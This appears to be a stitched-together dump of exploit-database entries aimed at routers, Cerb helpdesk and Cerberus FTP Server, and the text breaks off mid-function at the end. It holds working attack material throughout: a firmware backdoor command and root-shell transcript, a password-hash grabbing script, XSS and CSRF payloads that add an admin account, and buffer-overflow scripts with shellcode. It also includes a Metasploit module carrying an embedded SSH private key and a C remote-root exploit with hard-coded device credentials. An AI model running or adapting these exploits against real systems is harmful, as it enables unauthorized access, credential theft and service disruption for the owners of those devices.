The hidden 'pekpekengeng' backdoor enabling advanced commands
and access to root shell:
-------------------------------------------------------------------------
la $v0, 0x420000
nop
lw $s0, (off_419A48 - 0x420000)($v0) # off_419A48 = "pekpekengeng"
jalr $t9 ; strlen
move $a0, $s0 # s
lw $gp, 0x38+var_28($sp)
bne $s3, $v0, loc_403350
move $a0, $s5 # s1
la $t9, strncmp
move $a1, $s0 # s2
jalr $t9 ; strncmp
move $a2, $s3 # n
lw $gp, 0x38+var_28($sp)
bnez $v0, loc_403350
li $v1, 1
loc_4033A8:
la $t9, printf
addiu $a0, $s1, (aSNoSuchCommand - 0x410000) # "%s: no such command\n"
jalr $t9 ; printf
move $a1, $s4
la $a0, 0x410000
la $t9, puts
nop
jalr $t9 ; puts
addiu $a0, (aAdvancedComman - 0x410000) # "\nAdvanced commands:"
lw $gp, 0x28+var_18($sp)
nop
la $v0, 0x420000
nop
addiu $s0, $v0, (off_4199A8 - 0x420000)
la $v0, 0x410000
b loc_4020F8
addiu $s1, $v0, (a16sS - 0x410000) # " %-16s%s\n"
-------------------------------------------------------------------------
command> help
Avaliable commands:
info Show system informations
ping Ping!
clear clear screen
default Set default and reboot
passwd Change root password
reboot Reboot
ifconfig IP Configuration
iwconfig Configure a WLAN interface
iwpriv Configure private parameters of a WLAN interface
exit Exit
help show this help
command> sh
sh: no such command
command> pekpekengeng
pekpekengeng: no such command
command> help
Avaliable commands:
info Show system informations
ping Ping!
clear clear screen
default Set default and reboot
passwd Change root password
reboot Reboot
ifconfig IP Configuration
iwconfig Configure a WLAN interface
iwpriv Configure private parameters of a WLAN interface
exit Exit
help show this help
Advanced commands:
ifconfig IP Configuration
sh root shell
quit Quit
command> sh
BusyBox v1.11.2 (2013-02-22 10:51:58 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ #
Other hidden functionalities:
command> unistorm
Usage:
unistorm device mac count [interval] [len]
command>
command> unistorm 1 2 3
target: 02:7f875b7c:2ab4a770:4007c4:2aac5010:00
ioctl SIOCGIFINDEX: No such devicecommand>
Serial connection password: 123456789
Hidden 'ate' mode:
.text:00401BB0
.text:00401BB0 loc_401BB0: # CODE XREF: main+284j
.text:00401BB0 la $t9, lineedit_read_key
.text:00401BB4 nop
.text:00401BB8 jalr $t9 ; lineedit_read_key
.text:00401BBC move $a0, $s0
.text:00401BC0 lw $gp, 0xC8+var_B8($sp)
.text:00401BC4 nop
.text:00401BC8 la $t9, lineedit_handle_byte
.text:00401BCC nop
.text:00401BD0 jalr $t9 ; lineedit_handle_byte
.text:00401BD4 move $a0, $v0
.text:00401BD8 lw $gp, 0xC8+var_B8($sp)
.text:00401BDC
.text:00401BDC loc_401BDC: # CODE XREF: main+244j
.text:00401BDC lw $v1, -0x634C($s1)
.text:00401BE0 nop
.text:00401BE4 slti $v0, $v1, 3
.text:00401BE8 bnez $v0, loc_401BB0
.text:00401BEC li $v0, 3
.text:00401BF0 beq $v1, $v0, loc_401D48
.text:00401BF4 nop
.text:00401BF8 la $v0, 0x420000
.text:00401BFC nop
.text:00401C00 lw $v1, (dword_419CB8 - 0x420000)($v0)
.text:00401C04 li $v0, 1
.text:00401C08 bne $v1, $v0, loc_401C98
.text:00401C0C move $a1, $zero
.text:00401C10 la $a0, 0x410000
.text:00401C14 la $t9, puts
.text:00401C18 nop
.text:00401C1C jalr $t9 ; puts
.text:00401C20 addiu $a0, (aAteMode - 0x410000) # "ate mode"
.text:00401C24 lw $gp, 0xC8+var_B8($sp)
.text:00401C28 nop
.text:00401C2C la $v0, stdout
.text:00401C30 la $t9, fflush
.text:00401C34 lw $a0, (stdout - 0x41A000)($v0) # stream
.text:00401C38 jalr $t9 ; fflush
.text:00401C3C nop
.text:00401C40 lw $gp, 0xC8+var_B8($sp)
.text:00401C44 nop
.text:00401C48 la $t9, lineedit_back_term
.text:00401C4C nop
.text:00401C50 jalr $t9 ; lineedit_back_term
.text:00401C54 nop
.text:00401C58 lw $gp, 0xC8+var_B8($sp)
.text:00401C5C nop
.text:00401C60 la $a0, 0x410000
.text:00401C64 la $t9, system
.text:00401C68 nop
.text:00401C6C jalr $t9 ; system
.text:00401C70 addiu $a0, (aSh - 0x410000) # "sh"
.text:00401C74 lw $gp, 0xC8+var_B8($sp)
.text:00401C78 nop
.text:00401C7C la $t9, lineedit_set_term
.text:00401C80 nop
.text:00401C84 jalr $t9 ; lineedit_set_term
.text:00401C88 nop
.text:00401C8C lw $gp, 0xC8+var_B8($sp)
.text:00401C90 b loc_401D48
.text:00401C94 nop
Web server configuration information disclosure:
http://TARGET/hydra.conf
#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
# Date: 04.02.2016 #
# Exploit Author: asdizzle_ #
# Vendor Homepage: http://www.cerberusweb.com/ #
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
# Version: 5 - 6.7 #
# Tested on: Debian 8 / apache2 with cerb 5 #
#####################################################################################
# Prerequisites: #
# -At least one worker must be logged in #
# -/storage/tmp/ dir must be accessible #
# #
# If everything else fails try if there's directory listing in /storage/tmp #
# You might find attachments and even support tickets. #
#####################################################################################
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'
echo "[*] Trying to fetch cache file"
cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
if [ -z "$cachechk" ];then
echo "[-] File not found."
exit
else
echo "[+] Found. Extracting..."
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
if [ -z "$hashes" ];then
echo "[-] Hash extracting failed"
else
echo "[+] Extracting seems to have worked"
echo
echo "$hashes"
fi
fi
# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
# Date: 08/06/2021
# Exploit Author: Mohammad Hossein Kaviyany
# Vendor Homepage: www.cerberusftp.com
# Software Link: https://www.cerberusftp.com/download/
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
# Tested on: windows server 2016
# CVE: CVE-2019-25046
------------
About Cerberus FTP Server (From Vendor Site) :
Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS,
FIPS 140-2 validated, and Active Directory and LDAP authentication.
--------------------------------------------------------
Exploit Detailes :
This stored XSS bug happens when a user uploads an svg file with the following content :
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
Exploit POC :
# Vulnerable Path : /file/upload
# Parameter: files (POST)
# Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
#Payload:
POST /file/upload HTTP/1.1
Host: target.com
Connection: close
Content-Length: 484
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
Origin: https://target.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/file/d/home/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="cd"
/home
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="csrftoken"
z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="files[]"; filename="file.svg"
Content-Type: image/svg+xml
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
--------------------------
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)
# Exploit Title: Cerberus FTP server – Denial of Service
# Date: 2017-03-13
# Exploit Author: Peter Baris
# Vendor Homepage: https://www.cerberusftp.com/
# Software Link: [download link if available]
# Version: 8.0.10.1
# Tested on: Windows Server 2008 R2 Standard x64, Windows 7 Pro SP1 x64
# CVE : CVE-2017-6367
# 2017-02-27: Vulnerability discovered, Contact to Cerberus Support
# 2017-02-27: Reply received, PoC exploit code sent
# 2017-02-27: Problematic module identified by the vendor, gSOAP
# 2017-03-02: New version 8.0.10.2 released - https://www.cerberusftp.com/products/releasenotes/
# 2017-03-02: gSOAP module update released by the vendor and advisory placed https://www.genivia.com/advisory.html
# 2017-03-02: grace period until 13th March
# 2017-03-13: Publishing
import socket
import sys
try:
host = sys.argv[1]
port = 10001
except IndexError:
print "[+] Usage %s <host> " % sys.argv[0]
sys.exit()
exploit = "A"*5004
buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+exploit+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: "+host+":"+str(port)+"\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
source: https://www.securityfocus.com/bid/49444/info
Cerberus FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.
Cerberus FTP Server 4.0.9.8 is vulnerable; other versions may also be affected.
NOTE: The vendor refutes this issue stating the issue can not be replicated as described.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Buffer Overflow ( in REST command)
# Tested on : Windows XP SP3 (en)
##
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###
#=====[ Exploit Code ]======>
#!/usr/bin/python
# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Provided by : KedAns-Dz * Inj3ct0r Team
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
if len(sys.argv) != 3:
print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
shellcode = ("\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48"
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41"
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58"
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30"
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4b"
"\x58\x4e\x69\x43\x30\x43\x30\x43\x30\x43\x50\x4f\x79\x4b"
"\x55\x45\x61\x4e\x32\x43\x54\x4c\x4b\x42\x72\x50\x30\x4c"
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4c\x4b\x43"
"\x42\x45\x78\x46\x6f\x4d\x67\x51\x5a\x51\x36\x50\x31\x49"
"\x6f\x50\x31\x4b\x70\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x47"
"\x72\x46\x4c\x51\x30\x49\x51\x4a\x6f\x46\x6d\x47\x71\x4a"
"\x67\x4a\x42\x4a\x50\x46\x32\x51\x47\x4c\x4b\x43\x62\x44"
"\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x4e\x30\x4c\x4b\x47"
"\x30\x50\x78\x4e\x65\x49\x50\x50\x74\x51\x5a\x46\x61\x4e"
"\x30\x50\x50\x4c\x4b\x51\x58\x45\x48\x4e\x6b\x43\x68\x45"
"\x70\x47\x71\x4b\x63\x4a\x43\x45\x6c\x47\x39\x4c\x4b\x47"
"\x44\x4c\x4b\x46\x61\x48\x56\x50\x31\x49\x6f\x46\x51\x4f"
"\x30\x4e\x4c\x4b\x71\x4a\x6f\x44\x4d\x47\x71\x4a\x67\x44"
"\x78\x49\x70\x44\x35\x48\x74\x45\x53\x51\x6d\x4a\x58\x45"
"\x6b\x51\x6d\x44\x64\x44\x35\x48\x62\x51\x48\x4e\x6b\x51"
"\x48\x47\x54\x43\x31\x4b\x63\x43\x56\x4e\x6b\x46\x6c\x42"
"\x6b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4a\x73\x4e\x6b\x43"
"\x34\x4e\x6b\x47\x71\x48\x50\x4c\x49\x51\x54\x51\x34\x45"
"\x74\x43\x6b\x43\x6b\x50\x61\x46\x39\x51\x4a\x42\x71\x4b"
"\x4f\x4d\x30\x50\x58\x51\x4f\x50\x5a\x4e\x6b\x46\x72\x4a"
"\x4b\x4b\x36\x43\x6d\x51\x7a\x46\x61\x4e\x6d\x4f\x75\x4d"
"\x69\x43\x30\x47\x70\x45\x50\x50\x50\x42\x48\x44\x71\x4c"
"\x4b\x50\x6f\x4b\x37\x4b\x4f\x4a\x75\x4f\x4b\x4a\x50\x4d"
"\x65\x4e\x42\x42\x76\x50\x68\x4e\x46\x4e\x75\x4f\x4d\x4d"
"\x4d\x4b\x4f\x4e\x35\x47\x4c\x44\x46\x51\x6c\x44\x4a\x4d"
"\x50\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x47\x37\x45"
"\x43\x51\x62\x50\x6f\x42\x4a\x47\x70\x50\x53\x49\x6f\x49"
"\x45\x50\x63\x51\x71\x42\x4c\x42\x43\x46\x4e\x50\x65\x51"
"\x68\x43\x55\x45\x50\x41\x41")
buf = "\x41" * 244
buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
buf += "\x90" * 50
buf += shellcode
print "[+]Connecting with server..."
sleep(1)
try:
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(1024)
s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("REST "+buf+"\r\n")
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))# Connected again to Crash and BOF
sleep(1)
s.close()# Close connection and Crash!!!
print "[+]Exploit sent with sucess"
except:
print "[-]Error in connection with server: "+ip
#=====[ The End ]=======|
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb platform, which can be exploited to perform Cross-Site Request Forgery attacks against administrators of vulnerable web application to add administrate accounts into the system.
The vulnerability exists due to failure of the "/ajax.php" script to properly verify the source of incoming HTTP request. Taking into consideration that Cerb is a business-critical application, this security flaw may be quite dangerous if exploited by malicious attackers.
A simple exploit below will add admin user into the system when a logged-in victim opens a malicious page with the exploit:
<form action="http://[host]/ajax.php" method = "POST">
<input type="hidden" name="c" value="config">
<input type="hidden" name="a" value="handleSectionAction">
<input type="hidden" name="section" value="workers">
<input type="hidden" name="action" value="saveWorkerPeek">
<input type="hidden" name="id" value="0">
<input type="hidden" name="view_id" value="workers_cfg">
<input type="hidden" name="do_delete" value="0">
<input type="hidden" name="first_name" value="first name">
<input type="hidden" name="last_name" value="last name">
<input type="hidden" name="title" value="title">
<input type="hidden" name="email" value="username@mail.com">
<input type="hidden" name="at_mention_name" value="name">
<input type="hidden" name="is_disabled" value="0">
<input type="hidden" name="is_superuser" value="1">
<input type="hidden" name="lang_code" value="en_US">
<input type="hidden" name="timezone" value="Antarctica%2FTroll">
<input type="hidden" name="time_format" value="D%2C+d+M+Y+h%3Ai+a">
<input type="hidden" name="auth_extension_id" value="login.password">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_verify" value="password">
<input type="hidden" name="calendar_id" value="new">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Cerb 7.0.4
More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23269 - https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Auxiliary::Report
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info, {
'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
'Description' => %q{
Ceragon ships a public/private key pair on FibeAir IP-10 devices
that allows passwordless authentication to any other IP-10 device.
Since the key is easily retrievable, an attacker can use it to
gain unauthorized remote access as the "mateidu" user.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => [
'hdm', # Discovery
'todb' # Metasploit module and advisory text (mostly copy-paste)
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-0936'],
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
],
'DisclosureDate' => "Apr 01 2015", # Not a joke
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user)
factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
opt_hash = {
auth_methods: ['publickey'],
port: rport,
key_data: [ key_data ],
use_agent: false,
config: false,
proxy: factory,
non_interactive: true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, user, opt_hash)
end
rescue Rex::ConnectionError
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
ssh_socket = nil
return conn
else
return nil
end
end
def exploit
conn = do_login("mateidu")
if conn
print_good "#{rhost}:#{rport} - Successful login"
handler(conn.lsock)
end
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
-----END RSA PRIVATE KEY-----
EOF
end
end
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */
/* Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown */
/* uid=0(root) gid=0(root) */
/* # */
/* */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#define END_STRING "chau\n"
#define COMPLETE_STRING "fin-respuesta"
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL SO_NOSIGPIPE
#endif
#define perro(x) \
{ \
fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, x, \
strerror(errno)); \
exit(1); \
}
void send_root(int sock, int pid) {
char buf[1024] = {0};
char getal[1024] = "\x61\x64\x6d\x69\x6e\x0a";
char getap[1024] = "\x43\x65\x6e\x74\x75\x72\x79\x4c\x31\x6e\x6b\x0a";
char getrl[1024] = "\x73\x75\x20\x72\x6f\x6f\x74\x0a";
char getrp[1024] = "\x7a\x79\x61\x64\x35\x30\x30\x31";
recv(sock, buf, 1024 - 1, 0);
sleep(1);
if (strncmp(getal, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getal, strlen(getal) + 1, 0) < 0)
perro("send");
recv(sock, buf, 1024 - 1, 0);
sleep(1);
if (strncmp(getap, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getap, strlen(getap) + 1, 0) < 0)
perro("send");
sleep(2);
recv(sock, buf, 1024 - 1, 0);
if (strncmp(getrl, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getrl, strlen(getrl) + 1, 0) < 0)
perro("send");
sleep(2);
recv(sock, buf, 1024 - 1, 0);
if (strncmp(getrp, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, getrp, strlen(getrp) + 1, 0) < 0)
perro("send");
sleep(2);
}
void send_cmd(int sock, int pid) {
char str[1024] = {0};
while (fgets(str, 1024, stdin) == str) {
if (strncmp(str, END_STRING, strlen(END_STRING)) == 0)
break;
if (send(sock, str, strlen(str) + 1, 0) < 0)
perro("send");
}
kill(pid, SIGKILL);
}
void sys_info(int sock, int pid) {
char buf[1024] = {0};
char sysinfo[1024] = "\nuname -a; id;\n";
if (strncmp(sysinfo, END_STRING, strlen(END_STRING)) == 0)
;
if (send(sock, sysinfo, strlen(sysinfo) + 1, 0) < 0)
perro("send");
sleep(1);
int filled = 0;
while (filled = recv(sock, buf, 1024 - 1, 0)) {
buf[filled] = '\0';
printf("%s", buf);
fflush(stdout);
}
kill(pid, SIGKILL);
}
void receive(int sock) {
